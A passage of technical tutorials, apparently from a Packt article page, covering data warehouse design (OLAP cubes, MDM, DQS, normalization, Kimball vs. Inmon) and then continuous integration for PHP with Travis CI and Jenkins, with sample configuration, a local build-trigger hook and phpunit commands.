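print(cube[("Hat", "Devin", "June 5")])  # 23

# Aggregation over the Product dimension: how much did Mark pay on
# June 1 across all products (the "orange set of cells")?
mark_june1 = sum(
    amount
    for (product, customer, day), amount in cube.items()
    if customer == "Mark" and day == "June 1"
)
print(mark_june1)  # 55
```

A real cube engine precomputes and indexes such aggregates, which is why it answers them so much faster than a relational query would.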
There are different methods for visualizing information, such as strategic and tactical dashboards, Key Performance Indicators (KPIs), and detailed or consolidated reports. As you probably know, there are many reporting and visualization tools on the market. Microsoft provides a set of visualization tools to cover the dashboards, KPIs, scorecards, and reports required in a BI application. PerformancePoint, part of Microsoft SharePoint, is a dashboard tool that performs best when connected to an SSAS Multidimensional OLAP cube. Microsoft's SQL Server Reporting Services (SSRS) is a great reporting tool for creating detailed and consolidated reports. Excel is also a great slicing and dicing tool, especially for power users. There are also components in Excel, such as Power View, that are designed to build performance dashboards.

Master Data Management

Every organization has a part of its business that is common to different systems. That part of the data can be managed and maintained as master data. For example, an organization may receive customer information from an online web application form, from a retail store's spreadsheets, or from a web service provided by another vendor. Master Data Management (MDM) is the process of maintaining a single version of the truth for master data entities across multiple systems. Microsoft's solution for MDM is Master Data Services (MDS). Master data can be stored in MDS entities, and it can be maintained and changed through the MDS web UI or the Excel UI. Other systems, such as CRM, AX, and even the DW, can be subscribers to the master data entities. Even if one or more systems are able to change the master data, they can write their changes back into MDS through the staging architecture.

Data Quality Services

The quality of data differs in each operational system, especially when we deal with legacy systems or systems that have a high dependence on user input.
As the BI system is based on data, the better the quality of the data, the better the output of the BI solution. Because of this, working on data quality is one of the components of a BI system. As an example, Auckland might be written as "Auckland" in some Excel files but typed as "Aukland" by a user in an input form. As a solution to improve the quality of data, Microsoft provides DQS. DQS works based on Knowledge Base domains, which means a Knowledge Base can be created for different domains, and the Knowledge Base is maintained and improved by a data steward as time passes. There are also matching policies that can be used to apply standardization to the data.

Building the data warehouse

A data warehouse is a database built for analysis and reporting. In other words, a data warehouse is a database whose only data entry point is ETL and whose primary purpose is to cover reporting and data analysis requirements. This definition clarifies that a data warehouse is not like other transactional databases that operational systems write data into. When no operational system works directly with a data warehouse, and when the main purpose of the database is reporting, the design of the data warehouse will be different from that of transactional databases. If you recall the database normalization concepts, the main purpose of normalization is to reduce redundancy and dependency. The following table shows customers' data with their geographical information:

First Name   Last Name   Suburb        City       State     Country
Devin        Batler      Remuera       Auckland   Auckland  New Zealand
Peter        Blade       Remuera       Auckland   Auckland  New Zealand
Lance        Martin      City Center   Sydney     NSW       Australia

Let's elaborate on this example. As you can see from the preceding table, the geographical information in the records is redundant. This redundancy makes it difficult to apply changes.
For example, with this structure, if Remuera, for any reason, is no longer part of Auckland city, then the change has to be applied to every record that has Remuera as its suburb. The following screenshot shows the tables of geographical information:

So, a normalized approach is to remove the geographical information from the customer table and put it into another table, with the customer table holding only a key that points to it. This way, every time the value Remuera changes, only one record in the geographical table changes and the key remains unchanged. So, you can see that normalization is highly efficient in transactional systems.

This normalization approach is not as effective for analytical databases. If you consider a sales database with many tables related to each other and normalized at least up to the third normal form (3NF), then analytical queries on such a database may require more than 10 join conditions, which slows down the query response. In other words, from the point of view of reporting, it is better to denormalize the data and flatten it to make it as easy as possible to query. This means the first design in the preceding table might be better for reporting. However, query and reporting requirements are not that simple, and the business domains in the database are not as small as two or three tables. Real-world problems are solved with a special design method for the data warehouse called dimensional modeling.

There are two well-known methods for designing the data warehouse: the Kimball and Inmon methodologies, named after their creators. Both of these methods are in use nowadays. The main difference between them is that Inmon is top-down and Kimball is bottom-up. In this article, we will explain the Kimball method. You can read more about the Inmon methodology in Building the Data Warehouse, William H.
Inmon, Wiley (http://www.amazon.com/Building-Data-Warehouse-W-Inmon/dp/0764599445), and about the Kimball methodology in The Data Warehouse Toolkit, Ralph Kimball, Wiley (http://www.amazon.com/The-Data-Warehouse-Toolkit-Dimensional/dp/0471200247). Both books are must-reads for BI and DW professionals and belong on the bookshelf of every BI team. This article draws on The Data Warehouse Toolkit; for a detailed discussion, read the referenced book.

Dimensional modeling

To understand data warehouse design and dimensional modeling, it's better to first learn about the components and terminologies of a DW. A DW consists of fact tables and dimensions. The relationship between a fact table and its dimensions is based on foreign keys and primary keys (the primary key of the dimension table is referenced as a foreign key in the fact table).

Summary

This article explained the first steps in thinking about and designing a BI system. As the first step, a developer needs to design the data warehouse (DW), which requires an understanding of the key design concepts and methodologies used to create it.

Resources for Article:

Further resources on this subject:
Self-service Business Intelligence, Creating Value from Data [Article]
Oracle Business Intelligence : Getting Business Information from Data [Article]
Business Intelligence and Data Warehouse Solution - Architecture and Design [Article]

Packt
20 May 2014
14 min read

Continuous Integration

(For more resources related to this topic, see here.)

This article is named Continuous Integration; so, what exactly does this mean? You can find many long definitions, but to put it simply, it is a process where you integrate your code with code from other developers and run tests to verify the code's functionality. You are aiming to detect problems as soon as possible and to fix them immediately. It is always easier and cheaper to fix a couple of small problems than one big problem. This translates to the following workflow:

A change is committed to a version control system repository (such as Git or SVN).
The Continuous Integration (CI) server is either notified of, or detects, the change and then runs the defined tests.
CI notifies the developer if the tests fail.

With this method, you immediately know who created the problem and when. For CI to be able to run tests after every commit, these tests need to be fast. Usually, you can achieve this with unit tests; for integration and functional tests, it might be better to run them at a defined interval, for example, once every hour. You can have multiple sets of tests for each project, and another golden rule should be that no code is released to the production environment until all of the tests have passed. It may seem surprising, but these rules and processes shouldn't make your work any slower; in fact, they should allow you to work faster and be more confident about the developed code's functionality and changes. The initial investment pays off when you can focus on adding new functionality instead of spending time tracking bugs and fixing problems. Also, tested and reliable code can be released to the production environment more frequently than traditional big releases, which require a lot of manual testing and verification.
There is a real impact on business, and it is no longer just a discussion about whether it is worthwhile to write some tests and whether you will find yourself restricted by some stupid rules. What will really help, and is necessary, is a CI server for executing tests and processing the results; this is also called test automation. Of course, in theory you could write a script for it and run it manually, but why would you do that when there are some really nice and proven solutions available? Save your time and energy for something more useful. In this article, we will see what we can do with the most popular CI servers used by the PHP community:

Travis CI
Jenkins CI
Xinc

For us, a CI server will always have the same main task, that is, to execute tests; to be precise, this includes the following steps:

Check out the code from the repository.
Execute the tests.
Process the results.
Send a notification when tests fail.

This is the bare minimum that a server must handle. Of course, there is much more on offer, but these steps must be easy to configure.

Using a Travis CI hosted service

Travis is the easiest to use of the previously mentioned servers. Why is this the case? Because you don't have to install it. It's a service that provides integration with GitHub for many programming languages, not just PHP. Primarily, it's a solution for open source projects, meaning your repository on GitHub is a public repository. It also has commercial support for private repositories and commercial projects. What is really good is that you don't have to worry about server configuration; you just specify the required configuration (in the same way you do with Composer), and Travis does everything for you. You are not limited to unit tests; you can even specify which database you want to use and run integration tests there. However, there is also a disadvantage to this solution.
If you want to use it for a private repository, you have to pay for the service, and you are also limited with regard to the server configuration. You can specify your PHP version, but it's not recommended to specify a minor version such as 5.3.8; you should instead use a major version, such as 5.3. On the other hand, you can run tests against various PHP versions, such as PHP 5.3, 5.4, or 5.5, so when you want to upgrade your PHP version, you already have the test results and know how your code will behave with the new version. Travis has become the CI server of choice for many open source projects, and it's no real surprise, because it's really good!

Setting up Travis CI

To use Travis, you need an account on GitHub. If you haven't got one, navigate to https://github.com/ and register there. When you have a GitHub account, navigate to https://travis-ci.org/ and click on Sign in with GitHub. As you can see in the preceding screenshot, a Travis application will be added to your GitHub account. This application works as a trigger that starts a build after any change is pushed to the GitHub repository. To configure the Travis project, you have to follow these steps:

You will be asked to allow Travis to access your account. When you do this, you will go back to the Travis site, where you will see a list of your GitHub repositories.
By clicking on On/Off, you can decide which projects should be used by Travis.
When you click on a project configuration, you will be taken to GitHub to enable the service hook. This is because a build has to run after every commit, and Travis has to be notified about the change.
In the menu, search for Travis and fill in the details that you can find in your Travis account settings. Only the username and token are required; the domain is optional.
For a demonstration, you can refer to my sample project, where there is just one test suite whose purpose is to test how Travis works (navigate to https://github.com/machek/travis):

Using Travis CI

When you have linked your GitHub account to Travis and set up a project to notify Travis, you need to configure the project. You need to follow the project setup in the same way that we did earlier. Besides your classes, you need the test suites that you want to run, a bootstrap file, and a phpunit.xml configuration file. You should try this configuration locally to ensure that you can run PHPUnit, execute the tests, and make sure that all tests pass. If you cloned the sample project, you will see that there is one important file: .travis.yml. This Travis configuration file tells Travis what the server configuration should look like and what should happen after each commit. Let's have a look at this file:

# see http://about.travis-ci.org/docs/user/languages/php/ for more hints
language: php

# list any PHP version you want to test against
php:
  - 5.3
  - 5.4

# optionally specify a list of environments
env:
  - DB=mysql

# execute any number of scripts before the test run, custom env's are available as variables
before_script:
  - if [[ "$DB" == "mysql" ]]; then mysql -e "create database IF NOT EXISTS my_db;" -uroot; fi

# omitting "script:" will default to phpunit
script: phpunit --configuration phpunit.xml --coverage-text

# configure notifications (email, IRC, campfire etc)
notifications:
  email: "your@email"

As you can see, the configuration is really simple: it says that we need PHP 5.3 and 5.4 and a MySQL database, creates the database, executes PHPUnit with our configuration, and sends a report to my e-mail address. After each commit, PHPUnit executes all the tests. The following screenshot gives us an interesting insight into how Travis executes our tests and which environment it uses:

You can view the build and the history of all builds.
Even though there are no real builds in PHP, because PHP is an interpreted language and not a compiled one, the sequence of actions performed when you clone a repository, execute PHPUnit tests, and process the results is still usually called a build. Travis configuration can be much more complex; you can run Composer to update dependencies and much more. Just check the Travis documentation for PHP at http://about.travis-ci.org/docs/user/languages/php/.

Using the Jenkins CI server

Jenkins is a CI server. The difference between Travis and Jenkins is that Travis is used as a service, so you don't have to worry about the configuration, whereas Jenkins is a piece of software that you install on your own hardware. This is both an advantage and a disadvantage. The disadvantage is that you have to manually install it, configure it, and keep it up to date. The advantage is that you can configure it in a way that suits you, and all of the data and code stays completely under your control. This can be very important when you have customer code and data (for testing, never use live customer data) or sensitive information that can't be passed on to a third party. The Jenkins project started as a fork of the Hudson project. It is written in Java but has many plugins that suit a variety of programming languages, including PHP. In recent years, it has become very popular, and nowadays it is probably the most popular CI server. The reasons for its popularity are that it is really good, it can be configured easily, and there are many plugins available that cover probably everything you might need.

Installation

Installation is a really straightforward process. The easiest method is to use a Jenkins installation package from http://jenkins-ci.org/. There are packages available for Windows, OS X, and Linux, and the installation process is well documented there. Jenkins is written in Java, which means that Java or OpenJDK is required.
After this comes the installation itself: you just launch the installer and point it to where Jenkins should be installed, and Jenkins then listens on port 8080. Before we move on to configuring the first project (or job, in Jenkins terminology), we need to install a few extra plugins. This is Jenkins' biggest advantage: there are many plugins and they are very easy to install. It doesn't matter that Jenkins is a Java app, as it serves PHP very well. For our task of executing tests, processing results, and sending notifications, we need the following plugins:

Email-ext: This plugin is used to send notifications
Git or Subversion: This plugin is used to check out the code
xUnit: This plugin is used to process the PHPUnit test results
Clover PHP: This plugin is used to process the code coverage

To install these plugins, navigate to Jenkins | Manage Jenkins | Manage Plugins and select the Available tab. You can find and check the required plugins, or alternatively use the search filter to find the ones you need:

For e-mails, you might need to configure the SMTP server connection in the Manage Jenkins | Configure System | E-mail notification section.

Usage

By now, we should have installed everything that we need, and we can start to configure our first simple project. We can use the same simple project that we used for Travis. It has just one test case, but it is important to learn how to set up a project; it doesn't matter whether you have one test or thousands, as the setup is the same.

Creating a job

The first step is to create a new job. Select New Job from the Jenkins main navigation window, give it a name, and select Build a free-style software project. After clicking on OK, you get to the project configuration page.
The most interesting sections there are as follows:

Source Code Management: This is where you check out the code
Build Triggers: This specifies when to run the build
Build: This is the test execution step
Post-build Actions: This publishes results and sends notifications

The following screenshot shows the project configuration window in Jenkins CI:

Source Code Management

Source code management simply refers to your version control system, the path to the repository, and the branch or branches to be used. Every build is a clean operation, which means that Jenkins starts with a new directory into which the code is checked out.

Build Triggers

Build triggers are an interesting feature. You don't have to use them and can start a build manually, but it is better to specify when a build should run. It can run periodically at a given interval (for example, every two hours), or you can trigger a build remotely. One way to trigger a build is to use post-commit hooks in the Git/SVN repository. A post-commit hook is a script that is executed after every commit. Hooks are stored in the repository's hooks directory (.git/hooks for Git and /hooks for SVN). What you need to do is create a post-commit (SVN) or post-receive (Git) script that calls the URL given by Jenkins when you check the Trigger remotely checkbox with a secret token:

#!/bin/sh
wget "http://localhost:8080/job/Sample_Project/build?token=secret12345ABC" -O /dev/null

After every commit/push to the repository, Jenkins receives a request to run the build and executes the tests to check that everything still works and that no code change is causing unexpected problems.

Build

A build might sound like a strange term in the PHP world, as PHP is interpreted and not compiled, so why do we call it a build? It's just a word. For us, it refers to the main part of the process: executing the unit tests. You have to navigate to Add a build step and click on either Execute Windows batch command or Execute shell.
This depends on your operating system, but the command remains the same:

phpunit --log-junit=result.xml --coverage-clover=clover.xml

This is simple and outputs what we want: it executes the tests, stores the results in JUnit format in the file result.xml, and generates code coverage in Clover format in the file clover.xml. I should probably mention that PHPUnit is not installed with Jenkins; the build machine on which Jenkins is running must have PHPUnit installed and configured, including the PHP CLI.

Post-build Actions

In our case, three post-build actions are required. They are as follows:

Process the test results: This determines whether the build succeeded or failed. Navigate to Add a post-build action | Publish JUnit test result report and type result.xml. This matches the switch --log-junit=result.xml. Jenkins will use this file to check the test results and publish them.
Generate code coverage: This is similar to the first step. You have to add the Publish Clover PHP Coverage report action and type clover.xml. It uses the second switch, --coverage-clover=clover.xml, to generate code coverage, and Jenkins uses this file to create a code coverage report.
E-mail notification: It is a good idea to send an e-mail when a build fails in order to inform everybody that there is a problem, and maybe even let them know who caused it and what the last commit was. This step can be added simply by choosing the E-mail notification action.

Results

The result could be just an e-mail notification, which is handy, but Jenkins also has a very nice dashboard that displays the current status of each job, and you can view the build history to see when and why a build failed. A nice feature is that you can drill down through the test results or code coverage and find more details about test cases and coverage per class. To make testing even more interesting, you can use Jenkins' Continuous Integration Game plugin.
Every developer receives positive points for written tests and successful builds, and negative points for every build they break. The game leaderboard shows who is winning the build game and writing better code.
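The bare-minimum CI cycle listed at the start of this article (check out the code, execute the tests, process the results, notify on failure) can be sketched in a few lines of Python. This is a conceptual sketch only; the commands and the notify callable are placeholders, not how Travis or Jenkins actually work internally:

```python
import subprocess

def run_build(checkout_cmd, test_cmd, notify):
    """Minimal CI cycle: check out, run tests, notify on failure.

    checkout_cmd and test_cmd are shell commands; notify is any callable
    taking a message string (a real server would send e-mail, IRC, etc.).
    Returns True when the build passes.
    """
    checkout = subprocess.run(checkout_cmd, shell=True)
    if checkout.returncode != 0:
        notify("checkout failed")
        return False
    tests = subprocess.run(test_cmd, shell=True,
                           capture_output=True, text=True)
    if tests.returncode != 0:
        # A real server would parse a result.xml here; we forward raw output.
        notify("tests failed:\n" + tests.stdout + tests.stderr)
        return False
    return True

# Placeholder commands standing in for "git pull" and "phpunit ...":
ok = run_build("true", "echo 1 test passed", print)
print(ok)  # True
```

Everything a real CI server adds on top of this loop (dashboards, history, plugins, notifications, the build game) is elaboration of these same four steps.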